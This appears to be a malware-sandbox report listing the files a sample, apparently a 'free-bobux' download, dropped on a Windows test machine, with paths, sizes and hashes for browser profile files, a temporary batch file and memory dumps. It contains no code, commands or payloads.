Filesize
152B

MD5
a499254d6b5d91f97eb7a86e5f8ca573

SHA1
03dbfebfec8c94a9c06f9b0cd81ebe0a2b8be3d1

SHA256
fb87b758c2b98989df851380293ff6786cb9a5cf2b3a384cec70d9f3eb064499

SHA512
d7adcc76d0470bcd68d7644de3c8d2b6d61df8485979a4752ceea3df4d85bd1c290f72b3d8d5c8d639d5a10afa48d80e457f76b44dd8107ac97eb80fd98c7b0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
6KB

MD5
66c4fc01cd64107b5f3e477bd4745d9e

SHA1
67fe789cf74ff8b4897f132d90fc2c8fdb482e7f

SHA256
a224841ad1f0b29880a4cffa3d999d97ed88b5077d873fde36c620b128f806b8

SHA512
d3c432dd339e99cdae5d0496e751c11059d54a2d75554a323f591e94a68d795d8c91517e86372fb0c625a725267d1ea6c3932fccaf3a5997fee843612c705067

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
6KB

MD5
c069aa29bafbeaef9d938c43b968e594

SHA1
6efc729ab6ecd1999edf54b815d43439fa64f94f

SHA256
fe9fdbba1de381c9fb1a54a368e981d04605dcc3946dfcb0bc50618db99c2ca8

SHA512
c0d633bfd9f72826aec5f40a2df6dc8a8ad9a957cb72abed1000a5be3b3ef03af19f928f24ce1d1ee9b5da444601c8db6233d32c9ec16391ef05287ab4bc6d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
eedc04a21c1fbf580bccc591426cbac6

SHA1
bd83191ec3e34972456b9335432c2b4048f82f91

SHA256
d58592da0b55b8143c6a2e9f14bbcfa2e77e26984a8cb5b201de2d651834d284

SHA512
035241fabbbdef219b79857bc12678697da2e2409ede6c9cb9454112afec013c508cc652f805d52d70ce4e101792ecf8908824830a2fafc2a009f12a9b2ca15a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
308aa865f62a9fccbe4dcb1485a7ff5e

SHA1
32e9190721e0ea43f3c88ae3f422e4188fe531cd

SHA256
4514687182b7f17850da8291490af73408d17ebe3fa70bf84386c61e0cb0ce29

SHA512
19e36496385916409073172c11c6fc4a57ae052a56aae4ead94fd98bc41db3c963df273b1b961abc003949a64a1659632649de7d067a46edd4d7a26aaa05c373

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
766062e04802ece46e90ad533096cf2d

SHA1
42c5fada2d10a3403d3eda712a11954b8cbd7231

SHA256
946466ac22dbed51b33ee764b4826f45801c2e7fea9ba47190d0ed81dbf5b241

SHA512
0971071b59ae0d01e932f95d7f99097a833ed307d304bfa36052a9ff536677b1ebea772e643049c88576330525ce3e345e3595ca72851be91855bf79195364e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c372d9e80c9be7f3b0b36a5639824b4c

SHA1
f2d6545e685e14ede5a7bb331737c0b0742b3377

SHA256
8e71358504d3dbb39cb600ff4c448ac8dcd998b3de757bf831c2761ee9f35952

SHA512
0e00f12ef4fe2480e14c142fd2d1e1da204686a0f19b24fa9acf9561096efb69912ca42cd566aa7a75ba6faa5f620a3887ded1c412f50cea0b0d28f2491fdd59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c7ad857d9e8d1b54d5375f65419991d6

SHA1
12b8e3d4954fdba3cbaa7ec8c6aefe5d5c208186

SHA256
c622c922131d48564853890c3902847395e75be0e3186152658062e959268cd1

SHA512
5d9d1c7d6ccf1eda07ac2177ec6519da2c923dda05f3aca19972dd80561ece7992e83737113c0b9b0ad4b09a6aa1688ac274b16a8bfca09aa3d6c700cf781242

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
e62d303bbed1ea848f18c52fa0fc7936

SHA1
2035f1922db8b4105d7c42a0c8ad147c4ada4245

SHA256
d5b09245d397528cd859ffa9244d7f71407487f9bbe767695f2da7e1f20a2dfd

SHA512
3819a557af1347d2ec76e021eb6ccb0fbed60e930ca5314377f4bd0c86a83b1163b646affebf0d0f4bc11cab2e1f207fba1a15f63df51f08734ccff1e996ebee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
8359d6cd12e1975f89da2c8cb9c4598b

SHA1
c15e68bbd77b05273906f926beddec4448ba9f86

SHA256
ed4c1429fb55d28760ef184827d26117fcf9f20c51a467b02b69e6331d7d6bcd

SHA512
c1c8294ee482bcc4954a312f7daae4223b61ffb46f359abe8f223050d26bac86ce2c93909b92e8aff9235a6d54350e60d5c46d945cb87010c8d4fa4d7b5a7830

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
f467452811adbdb86b3b115765826657

SHA1
1ab5664d07ace3efd30ec7415576cef15da51154

SHA256
a38f2f4ae5d7d5ae3ed6e1c7dade32242800417b26c327ce626450fb03512db7

SHA512
0ddfb261276fecaee7d27d5fc696f87e1e6fd4a0aba614491567cccb0d5505475b92ea2f6392abd199ea15342a747891553719276a1713fbafe407c430385e74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
20d0da2d0a2c6402baba306a9dc57a19

SHA1
fea0410c682f8c09f18203553ca09b4de3690583

SHA256
1398c945159623aaf20c879f402571031106407d1a59b0aa9b4e6b8375e93e75

SHA512
401b347d2078a06983be72eeef815658efc314ade7952e8440a5f0cb26525caff410befb428f5ca80ccc0ca1dc28bd8c7ee9ef283b0348dd709d8291bba0a81a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
9048e354c6c07e34f8433d91def895a7

SHA1
cefd0870801929035ce6d4c4d581972705b89ee1

SHA256
9cabfe51b0bf9db11baa14c7b40d96d1a6b161af4827ac683c76ccf85239818e

SHA512
99030bfac17c616b65afa529c289344ce8ee47cad7451e983dbc10fc9d7172679070a379bf85064a2cbe0a92316a9d0af89678c18085be00e047b5e936d8f3cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5822e5.TMP

Filesize
1KB

MD5
cd859be33992a01dcd9c2874f79b0dfc

SHA1
77d174d431354bb73cf94dc9ecbfa76daf56de81

SHA256
ae89b1c3918f00c163715910cbf2f2e505fa2143fb5cbace36e2546bb53a044c

SHA512
84ec66d801f2baecca51a58c13efa90b16e19eec039cc489354ea7960d63d2206edae3356973fb5783cf4c0ba69298b26ebc50139279c6ce4f40470613be9194

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
1d3c952e1127712fd15b7b20ec48f718

SHA1
81b18f65450ae0ec106c09c0d5b01c9227a943ac

SHA256
7bcdb404e397290d307ce6544825c8ebfca445a6ffea80507bf45cca321eebfc

SHA512
b9d93596e1a52686349741e48155f34730582a88ae308aae3e22f06c3be1c231ff3ffc1f505251afb1f03d5951da70cdafd6f39db71e6de860948e2215513902

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
f03338480048ff8d9883f3d30c3554fe

SHA1
b1574b9edd87f7ea5985ace75214f8f2650f53ce

SHA256
da001f5c02c2004af1c79107a3745f46d5e87dc94c42dc5ab801e2763dc1602d

SHA512
a08d01995490d477a7670f43677c0f03c87cf75262c699ecf7383ed9225bdd8365da11a370274836db62438d474f4149292721134d52c672b4ad377978cf3505

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
04809afd8ea0dea55ede31f38d790a51

SHA1
fb6a9583b11abee39fc1a6ac659b68aaac12abd6

SHA256
2e220a1d7988adcc637aa5743b9a13f866c0237fbdb1a0f148e0d85afc598340

SHA512
d3235678b41067bced2deb159919cb1faa0688de635ccdfafc83c1343441d93952291be253d8a8eb6f2907f7156c48d612cda1ba679d9ec2663240a41e94e018

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a5c074e56305e761d7cbc42993300e1c

SHA1
39b2e23ba5c56b4f332b3607df056d8df23555bf

SHA256
e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

SHA512
c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\94C9.tmp\94CA.tmp\94CB.bat

Filesize
867B

MD5
addedb06062eef1e06beb01c81ede139

SHA1
fe92bda282254358c287991cd4020f393a3393fe

SHA256
98c6a0254f64be056923053dff9619232013371b7326bd539d5e1717d7844c3f

SHA512
a892597d9fed1cf6fb34d810ac3385a0e3c2ab03ecb09434eb2252d2cedc3f11c018a0d077a670113a18dcabeddb0f50fc6eda33b7e5ae078bf99d13e8874123

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bskn5cjp.xht.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 130046.crdownload

Filesize
89KB

MD5
86d68c9cdc087c76e48a453978b63b7c

SHA1
b8a684a8f125ceb86739ff6438d283dbafda714a

SHA256
df51babc1547a461656eaef01b873a91afcf61851b6f5ef06977e1c33e1b5f32

SHA512
dd627f071d994999172048f882ba61407461633634fdb2a3f2b8e6abff6324cc0d78682b5adc4aa4083e5baa1c981687f5c516d9e075eb00dfb58364cee1db04

Download Submit
C:\Users\Admin\Downloads\free-bobux-main.zip

Filesize
283KB

MD5
6238605d9b602a6cb44a53d6dc7ca40e

SHA1
429f7366136296dc67b41e05f9877ed762c54b73

SHA256
e315b421cb9bc6ae65fdeea180f5b12d2c4cf4117bf5872381bb20a1b28dbff9

SHA512
a8c5923c2e203cc2076030af51e4aa25f4c94b595a7f7d15c00c1c4e0eb91ae7734db9c3d59584642d18f5d63a8aecfadb06803a990ec51b668d3d93a079b1a7

Download Submit
memory/1768-626-0x0000015A98920000-0x0000015A98942000-memory.dmp

Filesize
136KB

Download
memory/4492-775-0x000001F9AF820000-0x000001F9AF821000-memory.dmp

Filesize
4KB

Download
memory/4492-773-0x000001F9AF820000-0x000001F9AF821000-memory.dmp

Filesize
4KB

Download
memory/4492-771-0x000001F9AF7A0000-0x000001F9AF7A1000-memory.dmp

Filesize
4KB

Download
memory/4492-776-0x000001F9AF8B0000-0x000001F9AF8B1000-memory.dmp

Filesize
4KB

Download
memory/4492-777-0x000001F9AF8B0000-0x000001F9AF8B1000-memory.dmp

Filesize
4KB

Download
memory/4492-778-0x000001F9AF8C0000-0x000001F9AF8C1000-memory.dmp

Filesize
4KB

Download
memory/4492-779-0x000001F9AF8C0000-0x000001F9AF8C1000-memory.dmp

Filesize
4KB

Download
memory/4492-760-0x000001F9A7470000-0x000001F9A7480000-memory.dmp

Filesize
64KB

Download
memory/4492-764-0x000001F9A74B0000-0x000001F9A74C0000-memory.dmp

Filesize
64KB

Download